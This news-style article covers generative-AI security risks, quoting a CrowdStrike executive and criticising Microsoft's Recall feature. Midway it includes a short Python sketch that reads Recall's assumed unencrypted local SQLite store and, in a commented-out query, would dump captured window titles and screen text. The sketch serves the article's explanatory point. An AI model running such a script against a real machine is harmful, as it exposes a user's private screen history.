Cybersecurity researchers have been warning for quite a while now that generative artificial intelligence (GenAI) programs are vulnerable to a vast array of attacks, from specially crafted prompts that can break guardrails, to data leaks that can reveal sensitive information.
The deeper the research goes, the more experts are finding just how much of a wide-open risk GenAI poses, especially to enterprise users with extremely sensitive and valuable data.
“This is a new attack vector that opens up a new attack surface,” said Elia Zaitsev, chief technology officer of cybersecurity vendor CrowdStrike, in an interview with ZDNET.
“I see with generative AI a lot of people just rushing to use this technology, and they’re bypassing the normal controls and methods” of secure computing, said Zaitsev.
“In many ways, you can think of generative AI technology as a new operating system, or a new programming language,” said Zaitsev. “A lot of people don’t have expertise with what the pros and cons are, and how to use it correctly, how to secure it correctly.”
The most infamous recent example of AI raising security concerns is Microsoft’s Recall feature, which originally was to be built into all new Copilot+ PCs.
Security researchers have shown that attackers who gain access to a PC with Recall enabled can see the entire history of the user's interactions with that PC, much as if a keystroke logger or other spyware had been deliberately installed on the machine.
“They have released a consumer feature that basically is built-in spyware, that copies everything you’re doing in an unencrypted local file,” explained Zaitsev. “That is a goldmine for adversaries to then go attack, compromise, and get all sorts of information.”
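To make that point concrete, here is a minimal sketch of what an attacker with access to the machine could do against an unencrypted local store. The folder layout, database name, and schema below are assumptions drawn from early third-party research into Recall preview builds, not a documented interface; the point is simply that reading such a store requires no credentials and no decryption.

```python
# Sketch only: the paths and schema are assumptions, not a documented API.
import sqlite3
from pathlib import Path

# Assumed location of Recall's on-disk index; the GUID folder varies per machine.
ukp_dir = Path.home() / "AppData" / "Local" / "CoreAIPlatform.00" / "UKP"
db_path = next(ukp_dir.glob("*/ukg.db"))   # raises StopIteration if nothing is found

conn = sqlite3.connect(db_path)            # plain SQLite: no key, no password prompt
cur = conn.cursor()

# Enumerate whatever tables the index exposes -- works regardless of the exact schema.
for (table_name,) in cur.execute("SELECT name FROM sqlite_master WHERE type='table'"):
    print(table_name)

# Hypothetical dump of captured screen text; table and column names are illustrative.
# for app, title, text in cur.execute(
#         "SELECT AppName, WindowTitle, Text FROM WindowCaptureText LIMIT 20"):
#     print(app, title, text[:80])

conn.close()
```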
After a backlash, Microsoft said it would turn the feature off by default, making it opt-in instead. Security researchers said the feature still carried risks even then. Subsequently, the company said it would not make Recall available as a preview feature in Copilot+ PCs, and it now says Recall “is coming soon through a post-launch Windows Update.”
The threat, however, is broader than a single poorly designed application. The same problem of centralizing large amounts of valuable information exists with all large language model (LLM) technology, said Zaitsev.